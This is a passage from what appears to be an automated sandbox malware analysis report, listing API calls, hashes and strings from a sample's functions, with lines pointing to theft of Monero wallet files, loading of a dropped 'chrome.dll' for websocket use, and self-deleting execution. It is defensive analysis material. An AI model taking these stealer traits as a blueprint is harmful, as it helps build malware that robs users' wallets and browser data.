                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: ebc1e450caaa69248d99a912f3f2db10e113d0f647eba18ff48f99c254c20d06
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 2D219072D42628AFDBA19F55CCC197F3A79FB81B90F054119F82967231C7308E419BE0
                                    Function 00BE7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB818,00000000,00020119,?), ref: 00BE7FEE
                                    • RegQueryValueExA.ADVAPI32(?,018BD830,00000000,00000000,000000FF,000000FF), ref: 00BE800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00BE8022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 557f7303d8b83c23930c81693ea3b28a5e7ee5c0cbdb41aa93dd6a80409b8281
                                    • Instruction ID: 3810cc7b784f365696ecac634484b97e57cb24f76cbaaa80a9c5d127116b8bb8
                                    • Opcode Fuzzy Hash: 557f7303d8b83c23930c81693ea3b28a5e7ee5c0cbdb41aa93dd6a80409b8281
                                    • Instruction Fuzzy Hash: 451191B2A44205EFD700CF86DD85FBFBBB8EB49B10F104159F615B7290D77569048BA0
                                    Function 00BE93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(018BDDB8,00000000,00000000,?,00BD9F71,00000000,018BDDB8,00000000), ref: 00BE93FC
                                    • lstrcpyn.KERNEL32(00EA7580,018BDDB8,018BDDB8,?,00BD9F71,00000000,018BDDB8), ref: 00BE9420
                                    • lstrlen.KERNEL32(00000000,?,00BD9F71,00000000,018BDDB8), ref: 00BE9437
                                    • wsprintfA.USER32 ref: 00BE9457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 32b482df778b0300dbfcb73dbe667b1cb3be6db92e7e70aa7268c85ff4570cd9
                                    • Instruction ID: 5d197024963a668a9ff1be38476fa29eef70a99ef07dce4b3b6a905e4b38d02a
                                    • Opcode Fuzzy Hash: 32b482df778b0300dbfcb73dbe667b1cb3be6db92e7e70aa7268c85ff4570cd9
                                    • Instruction Fuzzy Hash: E1010C75604108FFCB04DFA9DD85AAE7BB8EB49304F108288F949AB251D731AA44DB90
                                    Function 00BD12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BD12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BD12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00BD12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 4a9eeaf652dd2b7359950794273e1374af7b497914450cf22b916781dc6e0679
                                    • Instruction ID: 05293e8f6d1a0ec57ef4f3f4d68d5fede55070baad59912cd5aca8a94367561c
                                    • Opcode Fuzzy Hash: 4a9eeaf652dd2b7359950794273e1374af7b497914450cf22b916781dc6e0679
                                    • Instruction Fuzzy Hash: 5F0131B9A44209BFDB00DFD5DC49FAEB7B8EB4C700F004195FA45A7290D770AA048BA0
                                    Function 00BECB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 6ee10bfb79a97fd94d6ce25808f613dd26402d432ad6f9e2c68dc91c415ebad8
                                    • Instruction ID: 495f1acaf37b14db4f0b41d913bd56391e9c16de7dd820c2bb61f728ad71ac8d
                                    • Opcode Fuzzy Hash: 6ee10bfb79a97fd94d6ce25808f613dd26402d432ad6f9e2c68dc91c415ebad8
                                    • Instruction Fuzzy Hash: 3941E4B11007DC5EDB218B258D85FFBBFE8DB45704F2444E8E98A97282E3719A45DFA0
                                    Function 00BE68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BE6903
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE69C6
                                    • ExitProcess.KERNEL32 ref: 00BE69F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 3c28cf2f3ca54ca40a714fabfe3689990a5d6ac7ab4786dc39cffd9fc4f22b5e
                                    • Instruction ID: f353927b7cc0c4edfd3f29d344aa96a4a1b8bcd92fea3c0e9fc0015aeab49c64
                                    • Opcode Fuzzy Hash: 3c28cf2f3ca54ca40a714fabfe3689990a5d6ac7ab4786dc39cffd9fc4f22b5e
                                    • Instruction Fuzzy Hash: 833104B1901258AADB14EBA1DD92FDEB7B8AF18300F404199F20976191DF747A48CF69
                                    Function 00BE8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BF0E10,00000000,?), ref: 00BE89BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE89C6
                                    • wsprintfA.USER32 ref: 00BE89E0
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 82dde13f265f8affd1c3a66622bce2a76b3ed605c0f8d195026bacffea992253
                                    • Instruction ID: 358f761a7656750553bb200ed4b1734e973c0aabd6d796f82c5d03c9b301d35b
                                    • Opcode Fuzzy Hash: 82dde13f265f8affd1c3a66622bce2a76b3ed605c0f8d195026bacffea992253
                                    • Instruction Fuzzy Hash: 6F213DB2A44208AFDB00DF95DD45FAEBBB8FB4D710F104559FA15B7290C775A904CBA0
                                    Function 00BDA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BDA098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: cdfd93891722219a6da5d7afe23951da3df290f6938e0abd807a203ff1ba3bc6
                                    • Instruction ID: 52018491c81cb2e0f86c96f0530cfd07c127762069dc47d3494b3f037fb06594
                                    • Opcode Fuzzy Hash: cdfd93891722219a6da5d7afe23951da3df290f6938e0abd807a203ff1ba3bc6
                                    • Instruction Fuzzy Hash: 91F01D7175D204AED710DB6AECCDB6676E4E34B300F0009A5E185B72E0E275688CDB56
                                    Function 00BE8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BE96AE,00000000), ref: 00BE8EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE8EF2
                                    • wsprintfW.USER32 ref: 00BE8F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 5d11956cb692934614c4b76795f24551a4960e4fa5c56801883921c31c5a1609
                                    • Instruction ID: d0d23965c359ff579ada19d21dada905cbc45d9bccc91700f157228d5ff1189d
                                    • Opcode Fuzzy Hash: 5d11956cb692934614c4b76795f24551a4960e4fa5c56801883921c31c5a1609
                                    • Instruction Fuzzy Hash: C9E086B1A48308BFD700DB95DD0AE6D77B8EB09301F000094FD4997350D9716E048BA1
                                    Function 00BDA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDAA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00BDAB2F
                                    • lstrlen.KERNEL32(00000000), ref: 00BDADEC
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDAE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: b2328baaa6d5b17abdc855fa0641082abb76873729ef4da865269a5924a51822
                                    • Instruction ID: e6b9f5ec2c64f25450da6952ee4c9bc73a2d30726f9fa71db9dd688d50e8fc70
